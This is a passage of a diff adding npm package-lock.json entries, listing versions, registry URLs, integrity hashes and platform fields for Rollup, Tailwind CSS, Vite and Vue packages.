"resolved": "https://registry.npmjs.org/@jridgewell/resolve-uri/-/resolve-uri-3.1.2.tgz", + "integrity": "sha512-bRISgCIjP20/tbWSPWMEi54QVPRZExkuD9lJL+UIxUKtwVJA8wW1Trb1jMs1RFXo1CBTNZ/5hpC9QvmKWdopKw==", + "license": "MIT", + "engines": { + "node": ">=6.0.0" + } + }, + "node_modules/@jridgewell/sourcemap-codec": { + "version": "1.5.5", + "resolved": "https://registry.npmjs.org/@jridgewell/sourcemap-codec/-/sourcemap-codec-1.5.5.tgz", + "integrity": "sha512-cYQ9310grqxueWbl+WuIUIaiUaDcj7WOq5fVhEljNVgRfOUhY9fy2zTvfoqWsnebh8Sl70VScFbICvJnLKB0Og==", + "license": "MIT" + }, + "node_modules/@jridgewell/trace-mapping": { + "version": "0.3.31", + "resolved": "https://registry.npmjs.org/@jridgewell/trace-mapping/-/trace-mapping-0.3.31.tgz", + "integrity": "sha512-zzNR+SdQSDJzc8joaeP8QQoCQr8NuYx2dIIytl1QeBEZHJ9uW6hebsrYgbz8hJwUQao3TWCMtmfV8Nu1twOLAw==", + "license": "MIT", + "dependencies": { + "@jridgewell/resolve-uri": "^3.1.0", + "@jridgewell/sourcemap-codec": "^1.4.14" + } + }, + "node_modules/@kurkle/color": { + "version": "0.3.4", + "resolved": "https://registry.npmjs.org/@kurkle/color/-/color-0.3.4.tgz", + "integrity": "sha512-M5UknZPHRu3DEDWoipU6sE8PdkZ6Z/S+v4dD+Ke8IaNlpdSQah50lz1KtcFBa2vsdOnwbbnxJwVM4wty6udA5w==", + "license": "MIT" + }, + "node_modules/@rolldown/pluginutils": { + "version": "1.0.0-beta.53", + "resolved": "https://registry.npmjs.org/@rolldown/pluginutils/-/pluginutils-1.0.0-beta.53.tgz", + "integrity": "sha512-vENRlFU4YbrwVqNDZ7fLvy+JR1CRkyr01jhSiDpE1u6py3OMzQfztQU2jxykW3ALNxO4kSlqIDeYyD0Y9RcQeQ==", + "dev": true, + "license": "MIT" + }, + "node_modules/@rollup/rollup-android-arm-eabi": { + "version": "4.57.0", + "resolved": "https://registry.npmjs.org/@rollup/rollup-android-arm-eabi/-/rollup-android-arm-eabi-4.57.0.tgz", + "integrity": "sha512-tPgXB6cDTndIe1ah7u6amCI1T0SsnlOuKgg10Xh3uizJk4e5M1JGaUMk7J4ciuAUcFpbOiNhm2XIjP9ON0dUqA==", + "cpu": [ + "arm" + ], + "dev": true, + "license": "MIT", + "optional": true, + "os": [ + "android" + ] + }, + "node_modules/@rollup/rollup-android-arm64": { + "version": "4.57.0", + "resolved": "https://registry.npmjs.org/@rollup/rollup-android-arm64/-/rollup-android-arm64-4.57.0.tgz", + "integrity": "sha512-sa4LyseLLXr1onr97StkU1Nb7fWcg6niokTwEVNOO7awaKaoRObQ54+V/hrF/BP1noMEaaAW6Fg2d/CfLiq3Mg==", + "cpu": [ + "arm64" + ], + "dev": true, + "license": "MIT", + "optional": true, + "os": [ + "android" + ] + }, + "node_modules/@rollup/rollup-darwin-arm64": { + "version": "4.57.0", + "resolved": "https://registry.npmjs.org/@rollup/rollup-darwin-arm64/-/rollup-darwin-arm64-4.57.0.tgz", + "integrity": "sha512-/NNIj9A7yLjKdmkx5dC2XQ9DmjIECpGpwHoGmA5E1AhU0fuICSqSWScPhN1yLCkEdkCwJIDu2xIeLPs60MNIVg==", + "cpu": [ + "arm64" + ], + "dev": true, + "license": "MIT", + "optional": true, + "os": [ + "darwin" + ] + }, + "node_modules/@rollup/rollup-darwin-x64": { + "version": "4.57.0", + "resolved": "https://registry.npmjs.org/@rollup/rollup-darwin-x64/-/rollup-darwin-x64-4.57.0.tgz", + "integrity": "sha512-xoh8abqgPrPYPr7pTYipqnUi1V3em56JzE/HgDgitTqZBZ3yKCWI+7KUkceM6tNweyUKYru1UMi7FC060RyKwA==", + "cpu": [ + "x64" + ], + "dev": true, + "license": "MIT", + "optional": true, + "os": [ + "darwin" + ] + }, + "node_modules/@rollup/rollup-freebsd-arm64": { + "version": "4.57.0", + "resolved": "https://registry.npmjs.org/@rollup/rollup-freebsd-arm64/-/rollup-freebsd-arm64-4.57.0.tgz", + "integrity": "sha512-PCkMh7fNahWSbA0OTUQ2OpYHpjZZr0hPr8lId8twD7a7SeWrvT3xJVyza+dQwXSSq4yEQTMoXgNOfMCsn8584g==", + "cpu": [ + "arm64" + ], + "dev": true, + "license": "MIT", + "optional": true, + "os": [ + "freebsd" + ] + }, + "node_modules/@rollup/rollup-freebsd-x64": { + "version": "4.57.0", + "resolved": "https://registry.npmjs.org/@rollup/rollup-freebsd-x64/-/rollup-freebsd-x64-4.57.0.tgz", + "integrity": "sha512-1j3stGx+qbhXql4OCDZhnK7b01s6rBKNybfsX+TNrEe9JNq4DLi1yGiR1xW+nL+FNVvI4D02PUnl6gJ/2y6WJA==", + "cpu": [ + "x64" + ], + "dev": true, + "license": "MIT", + "optional": true, + "os": [ + "freebsd" + ] + }, + "node_modules/@rollup/rollup-linux-arm-gnueabihf": { + "version": "4.57.0", + "resolved": "https://registry.npmjs.org/@rollup/rollup-linux-arm-gnueabihf/-/rollup-linux-arm-gnueabihf-4.57.0.tgz", + "integrity": "sha512-eyrr5W08Ms9uM0mLcKfM/Uzx7hjhz2bcjv8P2uynfj0yU8GGPdz8iYrBPhiLOZqahoAMB8ZiolRZPbbU2MAi6Q==", + "cpu": [ + "arm" + ], + "dev": true, + "license": "MIT", + "optional": true, + "os": [ + "linux" + ] + }, + "node_modules/@rollup/rollup-linux-arm-musleabihf": { + "version": "4.57.0", + "resolved": "https://registry.npmjs.org/@rollup/rollup-linux-arm-musleabihf/-/rollup-linux-arm-musleabihf-4.57.0.tgz", + "integrity": "sha512-Xds90ITXJCNyX9pDhqf85MKWUI4lqjiPAipJ8OLp8xqI2Ehk+TCVhF9rvOoN8xTbcafow3QOThkNnrM33uCFQA==", + "cpu": [ + "arm" + ], + "dev": true, + "license": "MIT", + "optional": true, + "os": [ + "linux" + ] + }, + "node_modules/@rollup/rollup-linux-arm64-gnu": { + "version": "4.57.0", + "resolved": "https://registry.npmjs.org/@rollup/rollup-linux-arm64-gnu/-/rollup-linux-arm64-gnu-4.57.0.tgz", + "integrity": "sha512-Xws2KA4CLvZmXjy46SQaXSejuKPhwVdaNinldoYfqruZBaJHqVo6hnRa8SDo9z7PBW5x84SH64+izmldCgbezw==", + "cpu": [ + "arm64" + ], + "dev": true, + "license": "MIT", + "optional": true, + "os": [ + "linux" + ] + }, + "node_modules/@rollup/rollup-linux-arm64-musl": { + "version": "4.57.0", + "resolved": "https://registry.npmjs.org/@rollup/rollup-linux-arm64-musl/-/rollup-linux-arm64-musl-4.57.0.tgz", + "integrity": "sha512-hrKXKbX5FdaRJj7lTMusmvKbhMJSGWJ+w++4KmjiDhpTgNlhYobMvKfDoIWecy4O60K6yA4SnztGuNTQF+Lplw==", + "cpu": [ + "arm64" + ], + "dev": true, + "license": "MIT", + "optional": true, + "os": [ + "linux" + ] + }, + "node_modules/@rollup/rollup-linux-loong64-gnu": { + "version": "4.57.0", + "resolved": "https://registry.npmjs.org/@rollup/rollup-linux-loong64-gnu/-/rollup-linux-loong64-gnu-4.57.0.tgz", + "integrity": "sha512-6A+nccfSDGKsPm00d3xKcrsBcbqzCTAukjwWK6rbuAnB2bHaL3r9720HBVZ/no7+FhZLz/U3GwwZZEh6tOSI8Q==", + "cpu": [ + "loong64" + ], + "dev": true, + "license": "MIT", + "optional": true, + "os": [ + "linux" + ] + }, + "node_modules/@rollup/rollup-linux-loong64-musl": { + "version": "4.57.0", + "resolved": "https://registry.npmjs.org/@rollup/rollup-linux-loong64-musl/-/rollup-linux-loong64-musl-4.57.0.tgz", + "integrity": "sha512-4P1VyYUe6XAJtQH1Hh99THxr0GKMMwIXsRNOceLrJnaHTDgk1FTcTimDgneRJPvB3LqDQxUmroBclQ1S0cIJwQ==", + "cpu": [ + "loong64" + ], + "dev": true, + "license": "MIT", + "optional": true, + "os": [ + "linux" + ] + }, + "node_modules/@rollup/rollup-linux-ppc64-gnu": { + "version": "4.57.0", + "resolved": "https://registry.npmjs.org/@rollup/rollup-linux-ppc64-gnu/-/rollup-linux-ppc64-gnu-4.57.0.tgz", + "integrity": "sha512-8Vv6pLuIZCMcgXre6c3nOPhE0gjz1+nZP6T+hwWjr7sVH8k0jRkH+XnfjjOTglyMBdSKBPPz54/y1gToSKwrSQ==", + "cpu": [ + "ppc64" + ], + "dev": true, + "license": "MIT", + "optional": true, + "os": [ + "linux" + ] + }, + "node_modules/@rollup/rollup-linux-ppc64-musl": { + "version": "4.57.0", + "resolved": "https://registry.npmjs.org/@rollup/rollup-linux-ppc64-musl/-/rollup-linux-ppc64-musl-4.57.0.tgz", + "integrity": "sha512-r1te1M0Sm2TBVD/RxBPC6RZVwNqUTwJTA7w+C/IW5v9Ssu6xmxWEi+iJQlpBhtUiT1raJ5b48pI8tBvEjEFnFA==", + "cpu": [ + "ppc64" + ], + "dev": true, + "license": "MIT", + "optional": true, + "os": [ + "linux" + ] + }, + "node_modules/@rollup/rollup-linux-riscv64-gnu": { + "version": "4.57.0", + "resolved": "https://registry.npmjs.org/@rollup/rollup-linux-riscv64-gnu/-/rollup-linux-riscv64-gnu-4.57.0.tgz", + "integrity": "sha512-say0uMU/RaPm3CDQLxUUTF2oNWL8ysvHkAjcCzV2znxBr23kFfaxocS9qJm+NdkRhF8wtdEEAJuYcLPhSPbjuQ==", + "cpu": [ + "riscv64" + ], + "dev": true, + "license": "MIT", + "optional": true, + "os": [ + "linux" + ] + }, + "node_modules/@rollup/rollup-linux-riscv64-musl": { + "version": "4.57.0", + "resolved": "https://registry.npmjs.org/@rollup/rollup-linux-riscv64-musl/-/rollup-linux-riscv64-musl-4.57.0.tgz", + "integrity": "sha512-/MU7/HizQGsnBREtRpcSbSV1zfkoxSTR7wLsRmBPQ8FwUj5sykrP1MyJTvsxP5KBq9SyE6kH8UQQQwa0ASeoQQ==", + "cpu": [ + "riscv64" + ], + "dev": true, + "license": "MIT", + "optional": true, + "os": [ + "linux" + ] + }, + "node_modules/@rollup/rollup-linux-s390x-gnu": { + "version": "4.57.0", + "resolved": "https://registry.npmjs.org/@rollup/rollup-linux-s390x-gnu/-/rollup-linux-s390x-gnu-4.57.0.tgz", + "integrity": "sha512-Q9eh+gUGILIHEaJf66aF6a414jQbDnn29zeu0eX3dHMuysnhTvsUvZTCAyZ6tJhUjnvzBKE4FtuaYxutxRZpOg==", + "cpu": [ + "s390x" + ], + "dev": true, + "license": "MIT", + "optional": true, + "os": [ + "linux" + ] + }, + "node_modules/@rollup/rollup-linux-x64-gnu": { + "version": "4.57.0", + "resolved": "https://registry.npmjs.org/@rollup/rollup-linux-x64-gnu/-/rollup-linux-x64-gnu-4.57.0.tgz", + "integrity": "sha512-OR5p5yG5OKSxHReWmwvM0P+VTPMwoBS45PXTMYaskKQqybkS3Kmugq1W+YbNWArF8/s7jQScgzXUhArzEQ7x0A==", + "cpu": [ + "x64" + ], + "dev": true, + "license": "MIT", + "optional": true, + "os": [ + "linux" + ] + }, + "node_modules/@rollup/rollup-linux-x64-musl": { + "version": "4.57.0", + "resolved": "https://registry.npmjs.org/@rollup/rollup-linux-x64-musl/-/rollup-linux-x64-musl-4.57.0.tgz", + "integrity": "sha512-XeatKzo4lHDsVEbm1XDHZlhYZZSQYym6dg2X/Ko0kSFgio+KXLsxwJQprnR48GvdIKDOpqWqssC3iBCjoMcMpw==", + "cpu": [ + "x64" + ], + "dev": true, + "license": "MIT", + "optional": true, + "os": [ + "linux" + ] + }, + "node_modules/@rollup/rollup-openbsd-x64": { + "version": "4.57.0", + "resolved": "https://registry.npmjs.org/@rollup/rollup-openbsd-x64/-/rollup-openbsd-x64-4.57.0.tgz", + "integrity": "sha512-Lu71y78F5qOfYmubYLHPcJm74GZLU6UJ4THkf/a1K7Tz2ycwC2VUbsqbJAXaR6Bx70SRdlVrt2+n5l7F0agTUw==", + "cpu": [ + "x64" + ], + "dev": true, + "license": "MIT", + "optional": true, + "os": [ + "openbsd" + ] + }, + "node_modules/@rollup/rollup-openharmony-arm64": { + "version": "4.57.0", + "resolved": "https://registry.npmjs.org/@rollup/rollup-openharmony-arm64/-/rollup-openharmony-arm64-4.57.0.tgz", + "integrity": "sha512-v5xwKDWcu7qhAEcsUubiav7r+48Uk/ENWdr82MBZZRIm7zThSxCIVDfb3ZeRRq9yqk+oIzMdDo6fCcA5DHfMyA==", + "cpu": [ + "arm64" + ], + "dev": true, + "license": "MIT", + "optional": true, + "os": [ + "openharmony" + ] + }, + "node_modules/@rollup/rollup-win32-arm64-msvc": { + "version": "4.57.0", + "resolved": "https://registry.npmjs.org/@rollup/rollup-win32-arm64-msvc/-/rollup-win32-arm64-msvc-4.57.0.tgz", + "integrity": "sha512-XnaaaSMGSI6Wk8F4KK3QP7GfuuhjGchElsVerCplUuxRIzdvZ7hRBpLR0omCmw+kI2RFJB80nenhOoGXlJ5TfQ==", + "cpu": [ + "arm64" + ], + "dev": true, + "license": "MIT", + "optional": true, + "os": [ + "win32" + ] + }, + "node_modules/@rollup/rollup-win32-ia32-msvc": { + "version": "4.57.0", + "resolved": "https://registry.npmjs.org/@rollup/rollup-win32-ia32-msvc/-/rollup-win32-ia32-msvc-4.57.0.tgz", + "integrity": "sha512-3K1lP+3BXY4t4VihLw5MEg6IZD3ojSYzqzBG571W3kNQe4G4CcFpSUQVgurYgib5d+YaCjeFow8QivWp8vuSvA==", + "cpu": [ + "ia32" + ], + "dev": true, + "license": "MIT", + "optional": true, + "os": [ + "win32" + ] + }, + "node_modules/@rollup/rollup-win32-x64-gnu": { + "version": "4.57.0", + "resolved": "https://registry.npmjs.org/@rollup/rollup-win32-x64-gnu/-/rollup-win32-x64-gnu-4.57.0.tgz", + "integrity": "sha512-MDk610P/vJGc5L5ImE4k5s+GZT3en0KoK1MKPXCRgzmksAMk79j4h3k1IerxTNqwDLxsGxStEZVBqG0gIqZqoA==", + "cpu": [ + "x64" + ], + "dev": true, + "license": "MIT", + "optional": true, + "os": [ + "win32" + ] + }, + "node_modules/@rollup/rollup-win32-x64-msvc": { + "version": "4.57.0", + "resolved": "https://registry.npmjs.org/@rollup/rollup-win32-x64-msvc/-/rollup-win32-x64-msvc-4.57.0.tgz", + "integrity": "sha512-Zv7v6q6aV+VslnpwzqKAmrk5JdVkLUzok2208ZXGipjb+msxBr/fJPZyeEXiFgH7k62Ak0SLIfxQRZQvTuf7rQ==", + "cpu": [ + "x64" + ], + "dev": true, + "license": "MIT", + "optional": true, + "os": [ + "win32" + ] + }, + "node_modules/@tailwindcss/node": { + "version": "4.1.18", + "resolved": "https://registry.npmjs.org/@tailwindcss/node/-/node-4.1.18.tgz", + "integrity": "sha512-DoR7U1P7iYhw16qJ49fgXUlry1t4CpXeErJHnQ44JgTSKMaZUdf17cfn5mHchfJ4KRBZRFA/Coo+MUF5+gOaCQ==", + "license": "MIT", + "dependencies": { + "@jridgewell/remapping": "^2.3.4", + "enhanced-resolve": "^5.18.3", + "jiti": "^2.6.1", + "lightningcss": "1.30.2", + "magic-string": "^0.30.21", + "source-map-js": "^1.2.1", + "tailwindcss": "4.1.18" + } + }, + "node_modules/@tailwindcss/oxide": { + "version": "4.1.18", + "resolved": "https://registry.npmjs.org/@tailwindcss/oxide/-/oxide-4.1.18.tgz", + "integrity": "sha512-EgCR5tTS5bUSKQgzeMClT6iCY3ToqE1y+ZB0AKldj809QXk1Y+3jB0upOYZrn9aGIzPtUsP7sX4QQ4XtjBB95A==", + "license": "MIT", + "engines": { + "node": ">= 10" + }, + "optionalDependencies": { + "@tailwindcss/oxide-android-arm64": "4.1.18", + "@tailwindcss/oxide-darwin-arm64": "4.1.18", + "@tailwindcss/oxide-darwin-x64": "4.1.18", + "@tailwindcss/oxide-freebsd-x64": "4.1.18", + "@tailwindcss/oxide-linux-arm-gnueabihf": "4.1.18", + "@tailwindcss/oxide-linux-arm64-gnu": "4.1.18", + "@tailwindcss/oxide-linux-arm64-musl": "4.1.18", + "@tailwindcss/oxide-linux-x64-gnu": "4.1.18", + "@tailwindcss/oxide-linux-x64-musl": "4.1.18", + "@tailwindcss/oxide-wasm32-wasi": "4.1.18", + "@tailwindcss/oxide-win32-arm64-msvc": "4.1.18", + "@tailwindcss/oxide-win32-x64-msvc": "4.1.18" + } + }, + "node_modules/@tailwindcss/oxide-android-arm64": { + "version": "4.1.18", + "resolved": "https://registry.npmjs.org/@tailwindcss/oxide-android-arm64/-/oxide-android-arm64-4.1.18.tgz", + "integrity": "sha512-dJHz7+Ugr9U/diKJA0W6N/6/cjI+ZTAoxPf9Iz9BFRF2GzEX8IvXxFIi/dZBloVJX/MZGvRuFA9rqwdiIEZQ0Q==", + "cpu": [ + "arm64" + ], + "license": "MIT", + "optional": true, + "os": [ + "android" + ], + "engines": { + "node": ">= 10" + } + }, + "node_modules/@tailwindcss/oxide-darwin-arm64": { + "version": "4.1.18", + "resolved": "https://registry.npmjs.org/@tailwindcss/oxide-darwin-arm64/-/oxide-darwin-arm64-4.1.18.tgz", + "integrity": "sha512-Gc2q4Qhs660bhjyBSKgq6BYvwDz4G+BuyJ5H1xfhmDR3D8HnHCmT/BSkvSL0vQLy/nkMLY20PQ2OoYMO15Jd0A==", + "cpu": [ + "arm64" + ], + "license": "MIT", + "optional": true, + "os": [ + "darwin" + ], + "engines": { + "node": ">= 10" + } + }, + "node_modules/@tailwindcss/oxide-darwin-x64": { + "version": "4.1.18", + "resolved": "https://registry.npmjs.org/@tailwindcss/oxide-darwin-x64/-/oxide-darwin-x64-4.1.18.tgz", + "integrity": "sha512-FL5oxr2xQsFrc3X9o1fjHKBYBMD1QZNyc1Xzw/h5Qu4XnEBi3dZn96HcHm41c/euGV+GRiXFfh2hUCyKi/e+yw==", + "cpu": [ + "x64" + ], + "license": "MIT", + "optional": true, + "os": [ + "darwin" + ], + "engines": { + "node": ">= 10" + } + }, + "node_modules/@tailwindcss/oxide-freebsd-x64": { + "version": "4.1.18", + "resolved": "https://registry.npmjs.org/@tailwindcss/oxide-freebsd-x64/-/oxide-freebsd-x64-4.1.18.tgz", + "integrity": "sha512-Fj+RHgu5bDodmV1dM9yAxlfJwkkWvLiRjbhuO2LEtwtlYlBgiAT4x/j5wQr1tC3SANAgD+0YcmWVrj8R9trVMA==", + "cpu": [ + "x64" + ], + "license": "MIT", + "optional": true, + "os": [ + "freebsd" + ], + "engines": { + "node": ">= 10" + } + }, + "node_modules/@tailwindcss/oxide-linux-arm-gnueabihf": { + "version": "4.1.18", + "resolved": "https://registry.npmjs.org/@tailwindcss/oxide-linux-arm-gnueabihf/-/oxide-linux-arm-gnueabihf-4.1.18.tgz", + "integrity": "sha512-Fp+Wzk/Ws4dZn+LV2Nqx3IilnhH51YZoRaYHQsVq3RQvEl+71VGKFpkfHrLM/Li+kt5c0DJe/bHXK1eHgDmdiA==", + "cpu": [ + "arm" + ], + "license": "MIT", + "optional": true, + "os": [ + "linux" + ], + "engines": { + "node": ">= 10" + } + }, + "node_modules/@tailwindcss/oxide-linux-arm64-gnu": { + "version": "4.1.18", + "resolved": "https://registry.npmjs.org/@tailwindcss/oxide-linux-arm64-gnu/-/oxide-linux-arm64-gnu-4.1.18.tgz", + "integrity": "sha512-S0n3jboLysNbh55Vrt7pk9wgpyTTPD0fdQeh7wQfMqLPM/Hrxi+dVsLsPrycQjGKEQk85Kgbx+6+QnYNiHalnw==", + "cpu": [ + "arm64" + ], + "license": "MIT", + "optional": true, + "os": [ + "linux" + ], + "engines": { + "node": ">= 10" + } + }, + "node_modules/@tailwindcss/oxide-linux-arm64-musl": { + "version": "4.1.18", + "resolved": "https://registry.npmjs.org/@tailwindcss/oxide-linux-arm64-musl/-/oxide-linux-arm64-musl-4.1.18.tgz", + "integrity": "sha512-1px92582HkPQlaaCkdRcio71p8bc8i/ap5807tPRDK/uw953cauQBT8c5tVGkOwrHMfc2Yh6UuxaH4vtTjGvHg==", + "cpu": [ + "arm64" + ], + "license": "MIT", + "optional": true, + "os": [ + "linux" + ], + "engines": { + "node": ">= 10" + } + }, + "node_modules/@tailwindcss/oxide-linux-x64-gnu": { + "version": "4.1.18", + "resolved": "https://registry.npmjs.org/@tailwindcss/oxide-linux-x64-gnu/-/oxide-linux-x64-gnu-4.1.18.tgz", + "integrity": "sha512-v3gyT0ivkfBLoZGF9LyHmts0Isc8jHZyVcbzio6Wpzifg/+5ZJpDiRiUhDLkcr7f/r38SWNe7ucxmGW3j3Kb/g==", + "cpu": [ + "x64" + ], + "license": "MIT", + "optional": true, + "os": [ + "linux" + ], + "engines": { + "node": ">= 10" + } + }, + "node_modules/@tailwindcss/oxide-linux-x64-musl": { + "version": "4.1.18", + "resolved": "https://registry.npmjs.org/@tailwindcss/oxide-linux-x64-musl/-/oxide-linux-x64-musl-4.1.18.tgz", + "integrity": "sha512-bhJ2y2OQNlcRwwgOAGMY0xTFStt4/wyU6pvI6LSuZpRgKQwxTec0/3Scu91O8ir7qCR3AuepQKLU/kX99FouqQ==", + "cpu": [ + "x64" + ], + "license": "MIT", + "optional": true, + "os": [ + "linux" + ], + "engines": { + "node": ">= 10" + } + }, + "node_modules/@tailwindcss/oxide-wasm32-wasi": { + "version": "4.1.18", + "resolved": "https://registry.npmjs.org/@tailwindcss/oxide-wasm32-wasi/-/oxide-wasm32-wasi-4.1.18.tgz", + "integrity": "sha512-LffYTvPjODiP6PT16oNeUQJzNVyJl1cjIebq/rWWBF+3eDst5JGEFSc5cWxyRCJ0Mxl+KyIkqRxk1XPEs9x8TA==", + "bundleDependencies": [ + "@napi-rs/wasm-runtime", + "@emnapi/core", + "@emnapi/runtime", + "@tybys/wasm-util", + "@emnapi/wasi-threads", + "tslib" + ], + "cpu": [ + "wasm32" + ], + "license": "MIT", + "optional": true, + "dependencies": { + "@emnapi/core": "^1.7.1", + "@emnapi/runtime": "^1.7.1", + "@emnapi/wasi-threads": "^1.1.0", + "@napi-rs/wasm-runtime": "^1.1.0", + "@tybys/wasm-util": "^0.10.1", + "tslib": "^2.4.0" + }, + "engines": { + "node": ">=14.0.0" + } + }, + "node_modules/@tailwindcss/oxide-win32-arm64-msvc": { + "version": "4.1.18", + "resolved": "https://registry.npmjs.org/@tailwindcss/oxide-win32-arm64-msvc/-/oxide-win32-arm64-msvc-4.1.18.tgz", + "integrity": "sha512-HjSA7mr9HmC8fu6bdsZvZ+dhjyGCLdotjVOgLA2vEqxEBZaQo9YTX4kwgEvPCpRh8o4uWc4J/wEoFzhEmjvPbA==", + "cpu": [ + "arm64" + ], + "license": "MIT", + "optional": true, + "os": [ + "win32" + ], + "engines": { + "node": ">= 10" + } + }, + "node_modules/@tailwindcss/oxide-win32-x64-msvc": { + "version": "4.1.18", + "resolved": "https://registry.npmjs.org/@tailwindcss/oxide-win32-x64-msvc/-/oxide-win32-x64-msvc-4.1.18.tgz", + "integrity": "sha512-bJWbyYpUlqamC8dpR7pfjA0I7vdF6t5VpUGMWRkXVE3AXgIZjYUYAK7II1GNaxR8J1SSrSrppRar8G++JekE3Q==", + "cpu": [ + "x64" + ], + "license": "MIT", + "optional": true, + "os": [ + "win32" + ], + "engines": { + "node": ">= 10" + } + }, + "node_modules/@tailwindcss/postcss": { + "version": "4.1.18", + "resolved": "https://registry.npmjs.org/@tailwindcss/postcss/-/postcss-4.1.18.tgz", + "integrity": "sha512-Ce0GFnzAOuPyfV5SxjXGn0CubwGcuDB0zcdaPuCSzAa/2vII24JTkH+I6jcbXLb1ctjZMZZI6OjDaLPJQL1S0g==", + "license": "MIT", + "dependencies": { + "@alloc/quick-lru": "^5.2.0", + "@tailwindcss/node": "4.1.18", + "@tailwindcss/oxide": "4.1.18", + "postcss": "^8.4.41", + "tailwindcss": "4.1.18" + } + }, + "node_modules/@types/estree": { + "version": "1.0.8", + "resolved": "https://registry.npmjs.org/@types/estree/-/estree-1.0.8.tgz", + "integrity": "sha512-dWHzHa2WqEXI/O1E9OjrocMTKJl2mSrEolh1Iomrv6U+JuNwaHXsXx9bLu5gG7BUWFIN0skIQJQ/L1rIex4X6w==", + "dev": true, + "license": "MIT" + }, + "node_modules/@vitejs/plugin-vue": { + "version": "6.0.3", + "resolved": "https://registry.npmjs.org/@vitejs/plugin-vue/-/plugin-vue-6.0.3.tgz", + "integrity": "sha512-TlGPkLFLVOY3T7fZrwdvKpjprR3s4fxRln0ORDo1VQ7HHyxJwTlrjKU3kpVWTlaAjIEuCTokmjkZnr8Tpc925w==", + "dev": true, + "license": "MIT", + "dependencies": { + "@rolldown/pluginutils": "1.0.0-beta.53" + }, + "engines": { + "node": "^20.19.0 || >=22.12.0" + }, + "peerDependencies": { + "vite": "^5.0.0 || ^6.0.0 || ^7.0.0 || ^8.0.0-0", + "vue": "^3.2.25" + } + }, + "node_modules/@vue-macros/common": { + "version": "3.1.2", + "resolved": "https://registry.npmjs.org/@vue-macros/common/-/common-3.1.2.tgz", + "integrity": "sha512-h9t4ArDdniO9ekYHAD95t9AZcAbb19lEGK+26iAjUODOIJKmObDNBSe4+6ELQAA3vtYiFPPBtHh7+cQCKi3Dng==", + "license": "MIT", + "dependencies": { + "@vue/compiler-sfc": "^3.5.22", + "ast-kit": "^2.1.2", + "local-pkg": "^1.1.2", + "magic-string-ast": "^1.0.2", + "unplugin-utils": "^0.3.0" + }, + "engines": { + "node": ">=20.19.0" + }, + "funding": { + "url": "https://github.com/sponsors/vue-macros" + }, + "peerDependencies": { + "vue": "^2.7.0 || ^3.2.25" + }, + "peerDependenciesMeta": { + "vue": { + "optional": true + } + } + }, + "node_modules/@vue/compiler-core": { + "version": "3.5.27", + "resolved": "https://registry.npmjs.org/@vue/compiler-core/-/compiler-core-3.5.27.tgz", + "integrity": "sha512-gnSBQjZA+//qDZen+6a2EdHqJ68Z7uybrMf3SPjEGgG4dicklwDVmMC1AeIHxtLVPT7sn6sH1KOO+tS6gwOUeQ==", + "license": "MIT", + "dependencies": { + "@babel/parser": "^7.28.5", + "@vue/shared": "3.5.27", + "entities": "^7.0.0", + "estree-walker": "^2.0.2", + "source-map-js": "^1.2.1" + } + }, + "node_modules/@vue/compiler-dom": { + "version": "3.5.27", + "resolved": "https://registry.npmjs.org/@vue/compiler-dom/-/compiler-dom-3.5.27.tgz", + "integrity": "sha512-oAFea8dZgCtVVVTEC7fv3T5CbZW9BxpFzGGxC79xakTr6ooeEqmRuvQydIiDAkglZEAd09LgVf1RoDnL54fu5w==", + "license": "MIT", + "dependencies": { + "@vue/compiler-core": "3.5.27", + "@vue/shared": "3.5.27" + } + }, + "node_modules/@vue/compiler-sfc": { + "version": "3.5.27", + "resolved": "https://registry.npmjs.org/@vue/compiler-sfc/-/compiler-sfc-3.5.27.tgz", + "integrity": "sha512-sHZu9QyDPeDmN/MRoshhggVOWE5WlGFStKFwu8G52swATgSny27hJRWteKDSUUzUH+wp+bmeNbhJnEAel/auUQ==", + "license": "MIT", + "dependencies": { + "@babel/parser": "^7.28.5", + "@vue/compiler-core": "3.5.27", + "@vue/compiler-dom": "3.5.27", + "@vue/compiler-ssr": "3.5.27", + "@vue/shared": "3.5.27", + "estree-walker": "^2.0.2", + "magic-string": "^0.30.21", + "postcss": "^8.5.6", + "source-map-js": "^1.2.1" + } + }, + "node_modules/@vue/compiler-ssr": { + "version": "3.5.27", + "resolved": "https://registry.npmjs.org/@vue/compiler-ssr/-/compiler-ssr-3.5.27.tgz", + "integrity": "sha512-Sj7h+JHt512fV1cTxKlYhg7qxBvack+BGncSpH+8vnN+KN95iPIcqB5rsbblX40XorP+ilO7VIKlkuu3Xq2vjw==", + "license": "MIT", + "dependencies": { + "@vue/compiler-dom": "3.5.27", + "@vue/shared": "3.5.27" + } + }, + "node_modules/@vue/devtools-api": { + "version": "7.7.9", + "resolved": "https://registry.npmjs.org/@vue/devtools-api/-/devtools-api-7.7.9.tgz", + "integrity": "sha512-kIE8wvwlcZ6TJTbNeU2HQNtaxLx3a84aotTITUuL/4bzfPxzajGBOoqjMhwZJ8L9qFYDU/lAYMEEm11dnZOD6g==", + "license": "MIT", + "dependencies": { + "@vue/devtools-kit": "^7.7.9" + } + }, + "node_modules/@vue/devtools-kit": { + "version": "7.7.9", + "resolved": "https://registry.npmjs.org/@vue/devtools-kit/-/devtools-kit-7.7.9.tgz", + "integrity": "sha512-PyQ6odHSgiDVd4hnTP+aDk2X4gl2HmLDfiyEnn3/oV+ckFDuswRs4IbBT7vacMuGdwY/XemxBoh302ctbsptuA==", + "license": "MIT", + "dependencies": { + "@vue/devtools-shared": "^7.7.9", + "birpc": "^2.3.0", + "hookable": "^5.5.3", + "mitt": "^3.0.1", + "perfect-debounce": "^1.0.0", + "speakingurl": "^14.0.1", + "superjson": "^2.2.2" + } + }, + "node_modules/@vue/devtools-shared": { + "version": "7.7.9", + "resolved": "https://registry.npmjs.org/@vue/devtools-shared/-/devtools-shared-7.7.9.tgz", + "integrity": "sha512-iWAb0v2WYf0QWmxCGy0seZNDPdO3Sp5+u78ORnyeonS6MT4PC7VPrryX2BpMJrwlDeaZ6BD4vP4XKjK0SZqaeA==", + "license": "MIT", + "dependencies": { + "rfdc": "^1.4.1" + } + }, + "node_modules/@vue/reactivity": { + "version": "3.5.27", + "resolved": "https://registry.npmjs.org/@vue/reactivity/-/reactivity-3.5.27.tgz", + "integrity": "sha512-vvorxn2KXfJ0nBEnj4GYshSgsyMNFnIQah/wczXlsNXt+ijhugmW+PpJ2cNPe4V6jpnBcs0MhCODKllWG+nvoQ==", + "license": "MIT", + "dependencies": { + "@vue/shared": "3.5.27" + } + }, + "node_modules/@vue/runtime-core": { + "version": "3.5.27", + "resolved": "https://registry.npmjs.org/@vue/runtime-core/-/runtime-core-3.5.27.tgz", + "integrity": 